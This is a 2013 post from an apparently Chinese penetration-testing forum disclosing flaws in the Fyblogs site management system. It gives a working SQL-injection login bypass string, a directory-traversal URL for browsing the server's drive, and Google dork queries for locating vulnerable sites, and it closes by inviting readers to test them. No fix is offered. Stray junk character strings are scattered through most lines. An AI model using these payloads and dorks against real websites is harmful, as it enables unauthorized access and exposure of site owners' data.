中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
* O& r6 C- k2 G9 J7 C/ B3 I
' t& B5 r" ^$ O1 o简要描述:( g  M$ R; c: J6 s/ ]

. y6 y- O% p; w( w4 q& @3 ?% J& wFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
4 }$ P- B& R$ a) ^/ u) @/ I0 ~/ a! U/ `$ k  M) P
详细说明:" c% m9 D( W; {$ x1 A- z$ y; W

! k, o$ F8 n. @% ]; r# B+ _+ D后台万能密码 'or'='or'
: I( S: R8 S  T  `* o* `1 D后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!. j% o5 k0 i( z( n* N2 z
admin/uploadfile.asp?currentFolder=/upfiles/../
$ P# ^9 h1 `; Z1 L8 X5 a3 p7 u- }& F4 G0 R6 A! x
漏洞证明:/ F- }1 ?9 I" g' j8 s2 `7 W9 Y
; d: _& K0 u& G/ t) Z6 ~
谷歌:inurl:type.asp?id=1 新闻中心2 _. m2 U  D5 ]$ J+ n/ C  m* F
或者 :inurl:download_ok.asp?
$ X4 s1 ?+ L; K( J9 `( A8 `- V
3 w# @! a; M: |! i, b3 P可以测试$ ?$ I7 P" a* y; O
$ h+ u  N) x. {% X

- k: I. F+ w$ U



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2